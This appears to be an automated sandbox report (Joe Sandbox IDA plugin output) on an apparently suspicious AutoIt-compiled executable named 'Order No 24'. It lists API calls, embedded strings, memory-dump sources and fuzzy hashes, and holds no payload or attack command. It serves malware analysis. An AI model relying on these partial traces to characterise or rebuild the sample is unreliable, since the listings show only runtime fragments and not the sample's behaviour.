                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Foreground
                                                                                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                  • API String ID: 62970417-1919597938
                                                                                                                                  APIs
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E3735
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A1DC00,00000000,?,00000000,?,?), ref: 009E37A3
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009E37EB
                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 009E3874
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009E3B94
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 009E3BA1
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                  • API String ID: 536824911-966354055
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 009E6C56
                                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009E6D16
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                  • API String ID: 3974292440-719923060
                                                                                                                                  APIs
                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 009BCF91
                                                                                                                                  • __swprintf.LIBCMT ref: 009BD032
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD045
                                                                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009BD09A
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD0D6
                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 009BD10D
                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 009BD15F
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009BD195
                                                                                                                                  • GetParent.USER32(?), ref: 009BD1B3
                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 009BD1BA
                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 009BD234
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD248
                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 009BD26E
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD282
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                  • String ID: %s%u
                                                                                                                                  • API String ID: 3119225716-679674701
                                                                                                                                  APIs
                                                                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 009BD8EB
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD8FC
                                                                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 009BD924
                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 009BD941
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD95F
                                                                                                                                  • _wcsstr.LIBCMT ref: 009BD970
                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 009BD9A8
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BD9B8
                                                                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 009BD9DF
                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 009BDA28
                                                                                                                                  • _wcscmp.LIBCMT ref: 009BDA38
                                                                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 009BDA60
                                                                                                                                  • GetWindowRect.USER32(00000004,?), ref: 009BDAC9
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                  • String ID: @$ThumbnailClass
                                                                                                                                  • API String ID: 1788623398-1539354611
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                  • API String ID: 1038674560-1810252412
                                                                                                                                  APIs
                                                                                                                                  • LoadIconW.USER32(00000063), ref: 009BEAB0
                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009BEAC2
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 009BEAD9
                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 009BEAEE
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 009BEAF4
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 009BEB04
                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 009BEB0A
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009BEB2B
                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009BEB45
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009BEB4E
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 009BEBB9
                                                                                                                                  • GetDesktopWindow.USER32 ref: 009BEBBF
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 009BEBC6
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 009BEC12
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 009BEC1F
                                                                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 009BEC44
                                                                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009BEC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: b23f5cdfa844fcb9cf98eaa6324afe64d12303e5efe778672af2e2290eb41621
• Instruction ID: f9887f3b7c5d3919123212fbbe7eb56e5e6a81dccf74d890c97571a7bd8d9e25
• Opcode Fuzzy Hash: b23f5cdfa844fcb9cf98eaa6324afe64d12303e5efe778672af2e2290eb41621
• Instruction Fuzzy Hash: A4515E71900709EFDB20DFA9CE89FAEBBF9FF04714F004928E586A25A0C775A945CB10
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 009D79C6
• LoadCursorW.USER32(00000000,00007F00), ref: 009D79D1
• LoadCursorW.USER32(00000000,00007F03), ref: 009D79DC
• LoadCursorW.USER32(00000000,00007F8B), ref: 009D79E7
• LoadCursorW.USER32(00000000,00007F01), ref: 009D79F2
• LoadCursorW.USER32(00000000,00007F81), ref: 009D79FD
• LoadCursorW.USER32(00000000,00007F88), ref: 009D7A08
• LoadCursorW.USER32(00000000,00007F80), ref: 009D7A13
• LoadCursorW.USER32(00000000,00007F86), ref: 009D7A1E
• LoadCursorW.USER32(00000000,00007F83), ref: 009D7A29
• LoadCursorW.USER32(00000000,00007F85), ref: 009D7A34
• LoadCursorW.USER32(00000000,00007F82), ref: 009D7A3F
• LoadCursorW.USER32(00000000,00007F84), ref: 009D7A4A
• LoadCursorW.USER32(00000000,00007F04), ref: 009D7A55
• LoadCursorW.USER32(00000000,00007F02), ref: 009D7A60
• LoadCursorW.USER32(00000000,00007F89), ref: 009D7A6B
• GetCursorInfo.USER32(?), ref: 009D7A7B
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: b1bb5e320a1688370740c3d0698ff15607d4d30e6c363001a6107d813398663e
• Instruction ID: 4889320b8dae02412392c64887128148b6a97664290678dc9a5f216c074e3d4a
• Opcode Fuzzy Hash: b1bb5e320a1688370740c3d0698ff15607d4d30e6c363001a6107d813398663e
• Instruction Fuzzy Hash: BC31E1B1D4831A6ADB109FF68C8995FFEECFB04750F50452BA50DA7280EA78A5018FA1
APIs
  • Part of subcall function 0099E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0098C8B7,?,00002000,?,?,00000000,?,0098419E,?,?,?,00A1DC00), ref: 0099E984
  • Part of subcall function 0098660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009853B1,?,?,009861FF,?,00000000,00000001,00000000), ref: 0098662F
• __wsplitpath.LIBCMT ref: 0098C93E
  • Part of subcall function 009A1DFC: __wsplitpath_helper.LIBCMT ref: 009A1E3C
• _wcscpy.LIBCMT ref: 0098C953
• _wcscat.LIBCMT ref: 0098C968
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0098C978
• SetCurrentDirectoryW.KERNEL32(?), ref: 0098CABE
  • Part of subcall function 0098B337: _wcscpy.LIBCMT ref: 0098B36F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 2258743419-1018226102
• Opcode ID: aeb60a37b4bb970c8080bcd743433000186fea148d0f5ea050c26b0ae64b1526
• Instruction ID: f8ce61fd829ff1015653d856b32fa9d4fe141fc0acbcfe0576f5f9265350bcd0
• Opcode Fuzzy Hash: aeb60a37b4bb970c8080bcd743433000186fea148d0f5ea050c26b0ae64b1526
• Instruction Fuzzy Hash: 99129C715083459FC724EF24C881AAFBBE8BFD9314F44491EF589932A1DB34DA49CB62
APIs
• _memset.LIBCMT ref: 009ECEFB
• DestroyWindow.USER32(?,?), ref: 009ECF73
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009ECFF4
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009ED016
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009ED025
• DestroyWindow.USER32(?), ref: 009ED042
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00980000,00000000), ref: 009ED075
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009ED094
• GetDesktopWindow.USER32 ref: 009ED0A9
• GetWindowRect.USER32(00000000), ref: 009ED0B0
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009ED0C2
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009ED0DA
  • Part of subcall function 0099B526: GetWindowLongW.USER32(?,000000EB), ref: 0099B537
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
• String ID: 0$tooltips_class32
• API String ID: 3877571568-3619404913
• Opcode ID: ba3fd41ce76cab516ac1f5023991db593f0b48914743c83c8e1a905406a9446f
• Instruction ID: 1df9e29ff17ce9fa30023324b652653118b1b0c5984b2613c54eee68d855cc4c
• Opcode Fuzzy Hash: ba3fd41ce76cab516ac1f5023991db593f0b48914743c83c8e1a905406a9446f
• Instruction Fuzzy Hash: 1171CAB9140345AFDB21CF68CC84F6A7BE9EB89704F08491DF985872A1D735EC42CB22
APIs
  • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
• DragQueryPoint.SHELL32(?,?), ref: 009EF37A
  • Part of subcall function 009ED7DE: ClientToScreen.USER32(?,?), ref: 009ED807
  • Part of subcall function 009ED7DE: GetWindowRect.USER32(?,?), ref: 009ED87D
  • Part of subcall function 009ED7DE: PtInRect.USER32(?,?,009EED5A), ref: 009ED88D
• SendMessageW.USER32(?,000000B0,?,?), ref: 009EF3E3
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009EF3EE
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009EF411
• _wcscat.LIBCMT ref: 009EF441
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 009EF458
• SendMessageW.USER32(?,000000B0,?,?), ref: 009EF471
• SendMessageW.USER32(?,000000B1,?,?), ref: 009EF488
• SendMessageW.USER32(?,000000B1,?,?), ref: 009EF4AA
• DragFinish.SHELL32(?), ref: 009EF4B1
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 009EF59C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: 4532f6e567994b474abfc2b9a486730e2c3c98c9a7578a9cf63ce4e7c542caef
• Instruction ID: d17761d23241e0135fed87600a8023349eabfecc764f219292ec638999ae86fd
• Opcode Fuzzy Hash: 4532f6e567994b474abfc2b9a486730e2c3c98c9a7578a9cf63ce4e7c542caef
• Instruction Fuzzy Hash: D5613A72108344AFC701EFA4CC85E9BBBE8BFC9710F000A1EB595921A1DB71DA4ACB52
APIs
• VariantInit.OLEAUT32(00000000), ref: 009CAB3D
• VariantCopy.OLEAUT32(?,?), ref: 009CAB46
• VariantClear.OLEAUT32(?), ref: 009CAB52
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 009CAC40
• __swprintf.LIBCMT ref: 009CAC70
• VarR8FromDec.OLEAUT32(?,?), ref: 009CAC9C
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009CAD4D
                                                                                                                                  • SysFreeString.OLEAUT32(00000016), ref: 009CADDF
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009CAE35
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009CAE44
                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 009CAE80
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                  • API String ID: 3730832054-3931177956
                                                                                                                                  • Opcode ID: 7a5f8f036ca1a3cc58218231d2d70c2e1bb494fbdd5af21bfcc8df23a61da248
                                                                                                                                  • Instruction ID: 835a573ac40c31f0bc51480bc85f8d7f184f42ef28f54cad9dfddb07a783391e
                                                                                                                                  • Opcode Fuzzy Hash: 7a5f8f036ca1a3cc58218231d2d70c2e1bb494fbdd5af21bfcc8df23a61da248
                                                                                                                                  • Instruction Fuzzy Hash: 29D1EF71E00219EFCB249FA5D884F6AB7B9BF44704F14885DE4069B291DB78EC40DBA3
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 009E71FC
                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009E7247
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                  • API String ID: 3974292440-4258414348
                                                                                                                                  • Opcode ID: a94001bff2ed6f83daafcc1cec8c4741f2090281f1bfaee04f5500560463699c
                                                                                                                                  • Instruction ID: d5c1a76b3c4409fb5c9e17d974c0a0e4887db12a7551daa6d9170d527d462d05
                                                                                                                                  • Opcode Fuzzy Hash: a94001bff2ed6f83daafcc1cec8c4741f2090281f1bfaee04f5500560463699c
                                                                                                                                  • Instruction Fuzzy Hash: 79917E702087419BCB05EF65C851B6EB7A5BF94310F04485DF8966B3A3EB34ED0ADB92
                                                                                                                                  APIs
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009EE5AB
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009EBEAF), ref: 009EE607
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EE647
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EE68C
                                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009EE6C3
                                                                                                                                  • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,009EBEAF), ref: 009EE6CF
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009EE6DF
                                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,009EBEAF), ref: 009EE6EE
                                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009EE70B
                                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009EE717
                                                                                                                                    • Part of subcall function 009A0FA7: __wcsicmp_l.LIBCMT ref: 009A1030
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                                  • API String ID: 1212759294-1154884017
                                                                                                                                  • Opcode ID: 3c0bcffe51950de87785ccfb0cdb140a8b0bbcd53350052f414b7a7ba0a4a201
                                                                                                                                  • Instruction ID: 7ccc2e305b1d4abdc7b0ee8caf173012c9ee7af1d7d544c6591dd834ed1b2186
                                                                                                                                  • Opcode Fuzzy Hash: 3c0bcffe51950de87785ccfb0cdb140a8b0bbcd53350052f414b7a7ba0a4a201
                                                                                                                                  • Instruction Fuzzy Hash: 4461F171500259FAEB25DFA5CC86FBE77ACBB08B24F104505F911E61D1EB70AE81CBA0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 009CD292
                                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 009CD2DF
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CD327
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CD35E
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009CD38C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                  • API String ID: 1148790751-4113822522
                                                                                                                                  • Opcode ID: af33c4f8cff21eeaf8cbaf57cfcde09756d7fa79e5327a4b239c3ca4b8e68e40
                                                                                                                                  • Instruction ID: 32f8dc54ab2ac02ec119172c02775f8f6bcbe1fdcc094b38a5d70d4d30bf756e
                                                                                                                                  • Opcode Fuzzy Hash: af33c4f8cff21eeaf8cbaf57cfcde09756d7fa79e5327a4b239c3ca4b8e68e40
                                                                                                                                  • Instruction Fuzzy Hash: 05510A72508605AFC700EF24C991A6AB7E8FF98758F10486DF89567391DB31EE0ACB52
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,009F3973,00000016,0000138C,00000016,?,00000016,00A1DDB4,00000000,?), ref: 009C26F1
                                                                                                                                  • LoadStringW.USER32(00000000,?,009F3973,00000016), ref: 009C26FA
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,009F3973,00000016,0000138C,00000016,?,00000016,00A1DDB4,00000000,?,00000016), ref: 009C271C
                                                                                                                                  • LoadStringW.USER32(00000000,?,009F3973,00000016), ref: 009C271F
                                                                                                                                  • __swprintf.LIBCMT ref: 009C276F
                                                                                                                                  • __swprintf.LIBCMT ref: 009C2780
                                                                                                                                  • _wprintf.LIBCMT ref: 009C2829
                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009C2840
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                  • API String ID: 618562835-2268648507
                                                                                                                                  • Opcode ID: e329c3879c3733123feeb07d254792c97a5607b777908d94f657e507a82ef53e
                                                                                                                                  • Instruction ID: 16aa520db3dcefe28bf3872ca3b5c92f897715d036e9940f66bce36b55dd6f94
                                                                                                                                  • Opcode Fuzzy Hash: e329c3879c3733123feeb07d254792c97a5607b777908d94f657e507a82ef53e
                                                                                                                                  • Instruction Fuzzy Hash: DB414F72800219BBCF14FBE0DD96FEEB778AF95344F100469B50176192EA34AF49CBA1
                                                                                                                                  APIs
                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009CD0D8
                                                                                                                                  • __swprintf.LIBCMT ref: 009CD0FA
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 009CD137
                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009CD15C
                                                                                                                                  • _memset.LIBCMT ref: 009CD17B
                                                                                                                                  • _wcsncpy.LIBCMT ref: 009CD1B7
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009CD1EC
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009CD1F7
                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 009CD200
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009CD20A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                                  • Opcode ID: f77b7d8988bc89a95cdd21ea91ad5952cb9aee5399fb180ca8021cfaa0ed53e8
                                                                                                                                  • Instruction ID: 2069bfdc41a8c93e409f24f9c96873be1accec7b848c79921bef206380427fbc
                                                                                                                                  • Opcode Fuzzy Hash: f77b7d8988bc89a95cdd21ea91ad5952cb9aee5399fb180ca8021cfaa0ed53e8
                                                                                                                                  • Instruction Fuzzy Hash: 1131C2B2900109ABDB21DFE4CC49FEB37BCEF89700F1041BAF519D21A1EB7096468B65
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,009EBEF4,?,?), ref: 009EE754
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE76B
                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE776
